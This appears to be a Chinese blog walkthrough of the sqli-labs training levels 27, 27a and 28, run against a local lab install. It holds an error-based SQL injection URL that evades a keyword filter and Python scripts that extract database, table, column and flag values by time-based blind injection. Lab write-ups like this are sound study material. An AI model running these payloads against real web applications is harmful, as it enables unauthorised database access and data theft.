sql-labs-less27/less27a/less28/less28a|sql注入

TenG

发布于 2020-10-28 17:44:03

1.2K0

文章被收录于专栏：网安菜鸟成长记网安菜鸟成长记

前言：

本关为sql-labs系列less27、less27a、less28以及less28a，此系列持续更新，前面的关卡可以查看我前面的文章，如有错误的地方欢迎师傅指正。

正文：

less27:

本关过滤掉了union和select，不过解决办法也很简单，前面过滤or的时候使用双写就可以了，不过这一关要嵌套三个select（使用双写依然会完全过滤掉，我没有看源码具体也不清楚）。这里使用报错注入，由于查看数据库可以避免使用select，所以直接放一下查询表的步骤，看图：

成功爆出表名，看一下脚本：

http://localhost/sqli-labs-master/Less-27/?id=1’||extractvalue(1,concat(’~’,(seselselectectlect(group_concat(table_name))from(information_schema.tables)where(table_schema=‘security’))))||1='1

考察点就是select那里，值得一提的是这一关的or没有进行过滤，后面的步骤就跟前面的一样了，不再赘述。

less27a:

这一关跟less26a差别不大，也同样是没有错误回显，只是比26a多过滤了一个select，直接放脚本：

import requests
import time
import datetime

url = 'http://localhost/sqli-labs-master/Less-27a/?id=1"'

def get_dbname():
    db_name = ''
    for i in range(10):
        for k in range(32,127):
            payload = '%%26%%26if(ascii(substr(database(),%d,1))=%d,sleep(2),1)%%26%%261="1'%(i,k)
            time1 = datetime.datetime.now()
            res = requests.get(url+payload)
            time2 = datetime.datetime.now()
            difference = (time2-time1).seconds
            if difference > 1:
                db_name += chr(k)
                print("数据库名为->"+db_name)
get_dbname()

def get_table():
    tables_name = ''
    for i in range(40):
        for k in range(32,127):
            payload = '%%26%%26if(ascii(substr((seselselectectlect(group_concat(table_name))from(information_schema.tables)where(table_schema="security")),%d,1))=%d,sleep(2),1)%%26%%261="1'%(i,k)
            time1 = datetime.datetime.now()
            res = requests.get(url+payload)
            time2 = datetime.datetime.now()
            difference = (time2-time1).seconds
            if difference > 1:
                tables_name += chr(k)
                print("所有表名为->"+tables_name)
get_table()

def get_columns():
    columns_name = ''
    for i in range(10):
        for k in range(32,127):
            payload = '%%26%%26if(ascii(substr((selselselectectect(group_concat(column_name))from(information_schema.columns)where(table_name="flag")),%d,1))=%d,sleep(2),1)%%26%%261="1'%(i,k)
            time1 = datetime.datetime.now()
            res = requests.get(url+payload)
            time2 = datetime.datetime.now()
            difference = (time2-time1).seconds
            if difference > 1:
                columns_name += chr(k)
                print("所有字段名为->"+columns_name)
get_columns()

def get_flag():
    flag = ''
    for i in range(40):
        for k in range(32,127):
            payload = '%%26%%26if(ascii(substr((selselselectectect(flag)from(flag)),%d,1))=%d,sleep(2),1)%%26%%261="1'%(i,k)
            time1 = datetime.datetime.now()
            res = requests.get(url+payload)
            time2 = datetime.datetime.now()
            difference = (time2-time1).seconds
            if difference > 1:
                flag += chr(k)
                print("flag为->"+flag)
get_flag()

效果图：

差别不大就不再详细讲解。

less28：

直接放less28关的，我没有看其他的讲解，自己直接做了，不知道为啥less28比less27a还简单，less27a是双引号，而less28是单引号，而且还没有过滤select（我看的其他博客里面别的师傅说后台过滤了union select这两个一起用才会过滤），所以直接跟前面一样用脚本跑就可以了：

import requests
import time
import datetime

url = "http://localhost/sqli-labs-master/Less-28/?id=1'"

def get_dbname():
    db_name = ''
    for i in range(10):
        for k in range(32,127):
            payload = "%%26%%26if(ascii(substr(database(),%d,1))=%d,sleep(2),1)%%26%%261='1"%(i,k)
            time1 = datetime.datetime.now()
            res = requests.get(url+payload)
            time2 = datetime.datetime.now()
            difference = (time2-time1).seconds
            if difference > 1:
                db_name += chr(k)
                print("数据库名为->"+db_name)
get_dbname()

def get_tables():
    tables_name = ''
    for i in range(40):
        for k in range(32,127):
            payload = "%%26%%26if(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema='security')),%d,1))=%d,sleep(2),1)%%26%%261='1"%(i,k)
            time1 = datetime.datetime.now()
            res = requests.get(url+payload)
            time2 = datetime.datetime.now()
            difference = (time2-time1).seconds
            if difference > 1:
                tables_name += chr(k)
                print("所有表名为->"+tables_name)
get_tables()

def get_columns():
    columns_name = ''
    for i in range(10):
        for k in range(32,127):
            payload = "%%26%%26if(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='flag')),%d,1))=%d,sleep(2),1)%%26%%261='1"%(i,k)
            time1 = datetime.datetime.now()
            res = requests.get(url+payload)
            time2 = datetime.datetime.now()
            difference = (time2-time1).seconds
            if difference > 1:
                columns_name += chr(k)
                print("所有的字段名为->"+columns_name)
get_columns()

def get_flag():
    flag = ''
    for i in range(40):
        for k in range(32,127):
            payload = "%%26%%26if(ascii(substr((select(flag)from(flag)),%d,1))=%d,sleep(2),1)%%26%%261='1"%(i,k)
            time1 = datetime.datetime.now()
            res = requests.get(url+payload)
            time2 = datetime.datetime.now()
            difference = (time2-time1).seconds
            if difference > 1:
                flag += chr(k)
                print("flag为->"+flag)
get_flag()